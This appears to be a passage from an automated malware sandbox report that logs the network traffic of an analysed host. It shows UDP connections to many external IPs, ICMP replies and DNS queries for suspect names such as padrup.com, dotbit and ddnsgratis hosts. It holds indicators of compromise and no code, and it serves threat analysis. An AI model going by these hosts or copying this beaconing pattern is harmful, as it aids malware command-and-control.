                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:07.084881067 CEST53554211.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:07.086344004 CEST5662853192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:07.121176958 CEST53566281.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:07.144649029 CEST5724753192.168.2.9178.63.145.236
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:07.259047985 CEST572486420192.168.2.9183.82.146.144
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:07.828723907 CEST572496832192.168.2.9187.13.131.28
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:08.158703089 CEST5724753192.168.2.9178.63.145.236
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:08.317612886 CEST572507374192.168.2.9211.107.173.111
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:09.245842934 CEST5724753192.168.2.9178.63.145.236
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:11.301722050 CEST5724753192.168.2.9178.63.145.236
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:15.325527906 CEST5724753192.168.2.9178.63.145.236
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:18.637722969 CEST572516373192.168.2.992.241.90.238
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:19.379733086 CEST5640553192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:19.443394899 CEST53564051.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:19.444880962 CEST6435353192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:19.460015059 CEST53643531.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:19.461707115 CEST6412353192.168.2.937.187.0.40
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:19.503982067 CEST641244823192.168.2.9188.26.1.21
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:20.335758924 CEST641254770192.168.2.9109.124.19.10
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:20.505163908 CEST6412353192.168.2.937.187.0.40
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:21.641191006 CEST6412353192.168.2.937.187.0.40
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:21.646155119 CEST641267119192.168.2.9217.219.117.8
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:22.084018946 CEST641274343192.168.2.984.22.25.227
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:22.607924938 CEST641288260192.168.2.927.3.6.5
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:23.189407110 CEST641295372192.168.2.9201.58.235.159
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:23.709696054 CEST6412353192.168.2.937.187.0.40
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:23.796590090 CEST641305130192.168.2.9183.82.176.250
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:27.743957043 CEST6412353192.168.2.937.187.0.40
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:31.895919085 CEST6315753192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:32.029779911 CEST6315753192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:32.831510067 CEST53631571.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:32.831521034 CEST53631571.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:32.834800959 CEST5947153192.168.2.9128.199.248.105
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:33.107023001 CEST5947153192.168.2.9128.199.248.105
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:33.409229040 CEST5947153192.168.2.9128.199.248.105
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:33.878577948 CEST5947153192.168.2.9128.199.248.105
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:33.880516052 CEST594725734192.168.2.914.96.209.63
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:34.189891100 CEST5947153192.168.2.9128.199.248.105
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:34.459676981 CEST6273653192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:34.470710993 CEST53627361.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:34.472408056 CEST6213653192.168.2.995.85.9.86
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:34.940681934 CEST621374441192.168.2.993.94.54.35
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:35.591125011 CEST6213653192.168.2.995.85.9.86
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:35.647361040 CEST621387119192.168.2.9189.12.181.188
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:36.629070997 CEST6213653192.168.2.995.85.9.86
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:36.961955070 CEST621398030192.168.2.9193.140.107.175
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:37.489021063 CEST621405684192.168.2.989.34.124.109
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:38.561111927 CEST621415127192.168.2.9196.200.62.20
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:38.738105059 CEST6213653192.168.2.995.85.9.86
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:38.972367048 CEST621424579192.168.2.9123.237.94.47
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:39.504286051 CEST621436389192.168.2.9178.22.169.142
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:42.770468950 CEST6213653192.168.2.995.85.9.86
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:46.838177919 CEST5433853192.168.2.98.8.8.8
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:46.845820904 CEST53543388.8.8.8192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:49.005934954 CEST543397046192.168.2.9203.122.23.55
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:50.132889986 CEST543405460192.168.2.989.32.53.124
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:50.957659960 CEST543416554192.168.2.958.147.170.86
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:52.070143938 CEST543426621192.168.2.9196.20.112.81
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:52.566507101 CEST543436500192.168.2.9123.237.93.73
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.615158081 CEST543445295192.168.2.927.2.3.124
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.617563009 CEST5390553192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.628532887 CEST53539051.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.629956961 CEST5886453192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.653831005 CEST53588641.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.661932945 CEST4919153192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.703104973 CEST53491911.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.704653978 CEST5587753192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.714534044 CEST53558771.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.716046095 CEST6550553192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.727310896 CEST53655051.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.746553898 CEST5233553192.168.2.9178.17.170.133
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.815402031 CEST5233553192.168.2.9178.17.170.133
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.862550020 CEST5233553192.168.2.9178.17.170.133
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.910829067 CEST5233553192.168.2.9178.17.170.133
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.957437038 CEST5233553192.168.2.9178.17.170.133
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:54.004734039 CEST5920153192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:54.016729116 CEST53592011.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:54.018744946 CEST5536053192.168.2.9185.14.29.140
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:54.044097900 CEST5536053192.168.2.9185.14.29.140
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:54.081768990 CEST5536053192.168.2.9185.14.29.140
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:54.161009073 CEST5536053192.168.2.9185.14.29.140
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:54.207047939 CEST553616455192.168.2.9196.200.62.30
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:54.207907915 CEST5536053192.168.2.9185.14.29.140
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:54.248543024 CEST6486353192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:54.261307001 CEST53648631.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:54.263775110 CEST5923753192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:54.347028971 CEST5923753192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:54.400557041 CEST53592371.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:54.400573969 CEST53592371.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:54.415359020 CEST5854453192.168.2.9178.63.145.236
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:54.676359892 CEST585455127192.168.2.9124.125.109.155
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:55.430516958 CEST5854453192.168.2.9178.63.145.236
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:56.440752983 CEST5854453192.168.2.9178.63.145.236
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:58.444480896 CEST5854453192.168.2.9178.63.145.236
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:02.474888086 CEST5854453192.168.2.9178.63.145.236
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:04.130321026 CEST585464900192.168.2.958.72.195.130
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:05.166522980 CEST585478100192.168.2.9151.56.26.254
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:06.050421953 CEST585485446192.168.2.941.250.185.19
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:06.504868984 CEST5834853192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:06.596029043 CEST5834853192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:06.602900982 CEST53583481.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:06.604376078 CEST5174753192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:06.606148005 CEST53583481.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:06.613405943 CEST53517471.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:06.614948988 CEST5561453192.168.2.937.187.0.40
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:07.098982096 CEST556156219192.168.2.9178.123.176.220
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:07.635962963 CEST5561453192.168.2.937.187.0.40
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:07.660871029 CEST556168804192.168.2.931.140.4.130
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:08.643780947 CEST5561453192.168.2.937.187.0.40
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:08.757560968 CEST556175204192.168.2.993.113.189.169
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:09.316910982 CEST556186195192.168.2.981.90.238.197
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:09.817137957 CEST556195820192.168.2.9212.150.50.138
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:10.658979893 CEST5561453192.168.2.937.187.0.40
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:14.840624094 CEST5561453192.168.2.937.187.0.40
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:18.911434889 CEST4995753192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:18.940473080 CEST53499571.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:18.941973925 CEST5492353192.168.2.9128.199.248.105
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:19.252859116 CEST5492353192.168.2.9128.199.248.105
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:19.335988045 CEST549246130192.168.2.989.179.33.87
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:19.550877094 CEST5492353192.168.2.9128.199.248.105
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:19.875459909 CEST5492353192.168.2.9128.199.248.105
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:20.206214905 CEST5492353192.168.2.9128.199.248.105
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:20.472237110 CEST549255285192.168.2.9200.241.176.189
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:20.525527954 CEST6390853192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:20.611905098 CEST6390853192.168.2.91.1.1.1
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:20.620299101 CEST53639081.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:20.621762037 CEST5767953192.168.2.995.85.9.86
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:20.663866043 CEST53639081.1.1.1192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:21.224270105 CEST576806840192.168.2.941.251.18.107
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:21.644077063 CEST5767953192.168.2.995.85.9.86
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:22.347749949 CEST5768140036192.168.2.978.106.189.148
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:22.660218000 CEST5767953192.168.2.995.85.9.86
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:22.894309998 CEST576827617192.168.2.9188.72.28.186
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:24.019355059 CEST576834783192.168.2.959.99.50.127
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:24.542260885 CEST576844510192.168.2.9125.160.141.184
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:24.776211023 CEST5767953192.168.2.995.85.9.86
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:25.082176924 CEST576855549192.168.2.985.186.185.172
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:28.944122076 CEST5767953192.168.2.995.85.9.86
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:32.989737034 CEST5234453192.168.2.98.8.8.8
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:33.002341986 CEST53523448.8.8.8192.168.2.9
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:34.509999037 CEST523457368192.168.2.993.81.148.235
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:35.645075083 CEST523466028192.168.2.978.97.126.19

                                                                                                                                                                                                                                                                                          ICMP Packets

                                                                                                                                                                                                                                                                                          TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:46.041647911 CEST178.17.170.133192.168.2.91c84(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:46.126673937 CEST178.17.170.133192.168.2.91c84(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:46.235614061 CEST178.17.170.133192.168.2.91c84(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:46.286914110 CEST178.17.170.133192.168.2.91c84(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:46.356934071 CEST178.17.170.133192.168.2.91c84(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:46.429220915 CEST185.14.29.140192.168.2.99687(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:46.567645073 CEST185.14.29.140192.168.2.99687(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:46.671700001 CEST185.14.29.140192.168.2.99687(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:46.815556049 CEST185.14.29.140192.168.2.99687(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:46.847861052 CEST185.14.29.140192.168.2.99687(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:11.695054054 CEST128.199.248.105192.168.2.9391e(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:11.961205006 CEST128.199.248.105192.168.2.9391e(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:12.259316921 CEST128.199.248.105192.168.2.9391e(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:12.540050983 CEST128.199.248.105192.168.2.9391e(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:12.806139946 CEST128.199.248.105192.168.2.9391e(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:32.983635902 CEST178.17.170.133192.168.2.91c84(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:33.035825968 CEST178.17.170.133192.168.2.91c84(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:33.089720011 CEST178.17.170.133192.168.2.91c84(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:33.152163982 CEST178.17.170.133192.168.2.91c84(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:33.192622900 CEST178.17.170.133192.168.2.91c84(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:33.239440918 CEST185.14.29.140192.168.2.99687(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:33.284415007 CEST185.14.29.140192.168.2.99687(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:33.333213091 CEST185.14.29.140192.168.2.99687(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:33.359558105 CEST185.14.29.140192.168.2.99687(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:33.380587101 CEST185.14.29.140192.168.2.99687(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:59.241276979 CEST128.199.248.105192.168.2.9391e(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:59.555743933 CEST128.199.248.105192.168.2.9391e(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:42:59.833636999 CEST128.199.248.105192.168.2.9391e(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:00.114622116 CEST128.199.248.105192.168.2.9391e(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:00.425853968 CEST128.199.248.105192.168.2.9391e(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.323936939 CEST178.17.170.133192.168.2.91c84(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.391571999 CEST178.17.170.133192.168.2.91c84(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.437021017 CEST178.17.170.133192.168.2.91c84(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.481340885 CEST178.17.170.133192.168.2.91c84(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.560447931 CEST178.17.170.133192.168.2.91c84(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.590603113 CEST185.14.29.140192.168.2.99687(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.610661030 CEST185.14.29.140192.168.2.99687(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.632257938 CEST185.14.29.140192.168.2.99687(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.651472092 CEST185.14.29.140192.168.2.99687(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:19.675209999 CEST185.14.29.140192.168.2.99687(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:44.958175898 CEST128.199.248.105192.168.2.9391e(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:45.271939993 CEST128.199.248.105192.168.2.9391e(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:45.549484015 CEST128.199.248.105192.168.2.9391e(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:45.831425905 CEST128.199.248.105192.168.2.9391e(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:43:46.656413078 CEST128.199.248.105192.168.2.9391e(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:06.374625921 CEST178.17.170.133192.168.2.91c84(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:06.461400032 CEST178.17.170.133192.168.2.91c84(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:06.806920052 CEST178.17.170.133192.168.2.91c84(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:06.850286007 CEST178.17.170.133192.168.2.91c84(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:06.890846014 CEST178.17.170.133192.168.2.91c84(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:06.923554897 CEST185.14.29.140192.168.2.99687(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:06.943790913 CEST185.14.29.140192.168.2.99687(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:07.008116007 CEST185.14.29.140192.168.2.99687(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:07.043102026 CEST185.14.29.140192.168.2.99687(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:07.066385984 CEST185.14.29.140192.168.2.99687(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:33.099389076 CEST128.199.248.105192.168.2.9391e(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:33.372102976 CEST128.199.248.105192.168.2.9391e(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:33.837534904 CEST128.199.248.105192.168.2.9391e(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:34.143100023 CEST128.199.248.105192.168.2.9391e(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:34.454691887 CEST128.199.248.105192.168.2.9391e(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.787282944 CEST178.17.170.133192.168.2.91c84(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.856017113 CEST178.17.170.133192.168.2.91c84(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.903150082 CEST178.17.170.133192.168.2.91c84(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.951997995 CEST178.17.170.133192.168.2.91c84(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:53.998128891 CEST178.17.170.133192.168.2.91c84(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:54.036214113 CEST185.14.29.140192.168.2.99687(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:54.061536074 CEST185.14.29.140192.168.2.99687(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:54.099169970 CEST185.14.29.140192.168.2.99687(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:54.178461075 CEST185.14.29.140192.168.2.99687(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:54.225446939 CEST185.14.29.140192.168.2.99687(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:19.209472895 CEST128.199.248.105192.168.2.9391e(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:19.546246052 CEST128.199.248.105192.168.2.9391e(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:19.846641064 CEST128.199.248.105192.168.2.9391e(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:20.144072056 CEST128.199.248.105192.168.2.9391e(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:45:20.476675034 CEST128.199.248.105192.168.2.9391e(Port unreachable)Destination Unreachable

                                                                                                                                                                                                                                                                                          DNS Queries

                                                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:33.716404915 CEST192.168.2.91.1.1.10x818bStandard query (0)padrup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:45.760185003 CEST192.168.2.91.1.1.10x73baStandard query (0)ns.dotbit.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:45.805519104 CEST192.168.2.91.1.1.10x2a3aStandard query (0)alors.deepdns.cryptostorm.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:45.860176086 CEST192.168.2.91.1.1.10xc2e2Standard query (0)onyx.deepdns.cryptostorm.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:45.940160990 CEST192.168.2.91.1.1.10x84d4Standard query (0)ns1.any.dns.d0wn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:45.975197077 CEST192.168.2.91.1.1.10x9e14Standard query (0)ns1.random.dns.d0wn.bizA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:45.995835066 CEST192.168.2.9178.17.170.1330xe2e6Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:46.042836905 CEST192.168.2.9178.17.170.1330xe2e6Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:46.126920938 CEST192.168.2.9178.17.170.1330xe2e6Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:41:46.235937119 CEST192.168.2.9178.17.170.1330xe2e6Standard query (0)n.ddnsgratis.com.brA (IP address)IN (0x0001)false
